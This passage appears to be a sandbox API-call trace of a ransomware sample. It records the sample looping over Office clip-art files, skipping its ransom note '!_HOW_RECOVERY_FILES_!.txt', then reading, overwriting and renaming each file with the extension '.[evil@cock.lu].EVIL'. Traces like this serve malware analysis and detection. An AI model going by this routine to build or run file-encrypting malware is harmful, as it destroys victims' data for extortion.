lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.000] wcsstr (_Str="AN04117_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.000] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 69 [0108.000] wcscmp (_String1="AN04117_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.000] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04117_.WMF") returned 0x0 [0108.000] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 0x45 [0108.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.002] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x17ac, lpOverlapped=0x0) returned 1 [0108.004] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.004] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.004] _errno () returned 0x84b1160840 [0108.004] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.004] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x17c0, lpOverlapped=0x0) returned 1 [0108.004] CloseHandle (hObject=0x1a8) returned 1 [0108.004] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.005] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.005] __uncaught_exception () returned 0x84b1160800 [0108.005] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.005] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf.[evil@cock.lu].evil")) returned 1 [0108.006] ??_V@YAXPEAX@Z () returned 0x1 [0108.009] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF", dwFileAttributes=0x200) returned 0 [0108.009] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.009] wcsstr (_Str="AN04134_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.009] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 69 [0108.009] wcscmp (_String1="AN04134_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.009] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04134_.WMF") returned 0x0 [0108.009] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 0x45 [0108.009] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.011] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd58, lpOverlapped=0x0) returned 1 [0108.014] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.014] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.014] _errno () returned 0x84b1160840 [0108.014] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.014] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd60, lpOverlapped=0x0) returned 1 [0108.015] CloseHandle (hObject=0x1a8) returned 1 [0108.015] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.015] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.015] __uncaught_exception () returned 0x84b1160800 [0108.015] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04134_.wmf.[evil@cock.lu].evil")) returned 1 [0108.016] ??_V@YAXPEAX@Z () returned 0x1 [0108.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04134_.WMF", dwFileAttributes=0x200) returned 0 [0108.019] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.019] wcsstr (_Str="AN04174_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.019] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 69 [0108.019] wcscmp (_String1="AN04174_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.019] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04174_.WMF") returned 0x0 [0108.019] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 0x45 [0108.019] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.021] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa4c, lpOverlapped=0x0) returned 1 [0108.023] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.023] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.023] _errno () returned 0x84b1160840 [0108.023] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.023] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa60, lpOverlapped=0x0) returned 1 [0108.024] CloseHandle (hObject=0x1a8) returned 1 [0108.024] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.024] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.024] __uncaught_exception () returned 0x84b1160800 [0108.024] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.024] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf.[evil@cock.lu].evil")) returned 1 [0108.025] ??_V@YAXPEAX@Z () returned 0x1 [0108.027] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF", dwFileAttributes=0x200) returned 0 [0108.027] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.027] wcsstr (_Str="AN04191_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.027] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 69 [0108.027] wcscmp (_String1="AN04191_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.027] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04191_.WMF") returned 0x0 [0108.027] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 0x45 [0108.027] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.029] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x19ec, lpOverlapped=0x0) returned 1 [0108.031] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.031] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.032] _errno () returned 0x84b1160840 [0108.032] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.032] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a00, lpOverlapped=0x0) returned 1 [0108.032] CloseHandle (hObject=0x1a8) returned 1 [0108.032] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.032] __uncaught_exception () returned 0x84b1160800 [0108.032] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.032] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04191_.wmf.[evil@cock.lu].evil")) returned 1 [0108.033] ??_V@YAXPEAX@Z () returned 0x1 [0108.035] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04191_.WMF", dwFileAttributes=0x200) returned 0 [0108.035] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.036] wcsstr (_Str="AN04195_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.036] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 69 [0108.036] wcscmp (_String1="AN04195_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04195_.WMF") returned 0x0 [0108.036] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 0x45 [0108.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.037] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1204, lpOverlapped=0x0) returned 1 [0108.039] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.039] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.039] _errno () returned 0x84b1160840 [0108.040] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.040] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0108.040] CloseHandle (hObject=0x1a8) returned 1 [0108.040] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.040] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.040] __uncaught_exception () returned 0x84b1160800 [0108.040] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.040] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04195_.wmf.[evil@cock.lu].evil")) returned 1 [0108.041] ??_V@YAXPEAX@Z () returned 0x1 [0108.043] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04195_.WMF", dwFileAttributes=0x200) returned 0 [0108.043] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.043] wcsstr (_Str="AN04196_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.043] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 69 [0108.044] wcscmp (_String1="AN04196_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.044] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04196_.WMF") returned 0x0 [0108.044] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 0x45 [0108.044] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.045] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc48, lpOverlapped=0x0) returned 1 [0108.048] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.048] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.048] _errno () returned 0x84b1160840 [0108.048] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.048] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc60, lpOverlapped=0x0) returned 1 [0108.048] CloseHandle (hObject=0x1a8) returned 1 [0108.048] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.048] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.048] __uncaught_exception () returned 0x84b1160800 [0108.048] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.049] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04196_.wmf.[evil@cock.lu].evil")) returned 1 [0108.049] ??_V@YAXPEAX@Z () returned 0x1 [0108.052] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04196_.WMF", dwFileAttributes=0x200) returned 0 [0108.052] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.052] wcsstr (_Str="AN04206_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.052] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 69 [0108.052] wcscmp (_String1="AN04206_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.052] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04206_.WMF") returned 0x0 [0108.052] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 0x45 [0108.052] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.054] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1df4, lpOverlapped=0x0) returned 1 [0108.058] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.058] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.058] _errno () returned 0x84b1160840 [0108.058] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.058] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e00, lpOverlapped=0x0) returned 1 [0108.058] CloseHandle (hObject=0x1a8) returned 1 [0108.059] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.059] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.059] __uncaught_exception () returned 0x84b1160800 [0108.059] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.059] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04206_.wmf.[evil@cock.lu].evil")) returned 1 [0108.060] ??_V@YAXPEAX@Z () returned 0x1 [0108.063] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04206_.WMF", dwFileAttributes=0x200) returned 0 [0108.063] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.063] wcsstr (_Str="AN04225_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.063] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 69 [0108.063] wcscmp (_String1="AN04225_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0108.063] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN04225_.WMF") returned 0x0 [0108.063] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 0x45 [0108.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0108.065] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x212c, lpOverlapped=0x0) returned 1 [0108.067] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.067] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0108.068] _errno () returned 0x84b1160840 [0108.068] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.068] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2140, lpOverlapped=0x0) returned 1 [0108.068] CloseHandle (hObject=0x1a8) returned 1 [0108.068] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0108.068] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0108.068] __uncaught_exception () returned 0x84b1160800 [0108.068] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0108.068] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04225_.wmf.[evil@cock.lu].evil")) returned 1 [0108.069] ??_V@YAXPEAX@Z () returned 0x1 [0108.072] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04225_.WMF", dwFileAttributes=0x200) returned 0 [0108.073] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0108.073] wcsstr (_Str="AN04235_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0108.073] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 69 [0108.073] wcscmp (_String1="AN04235_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 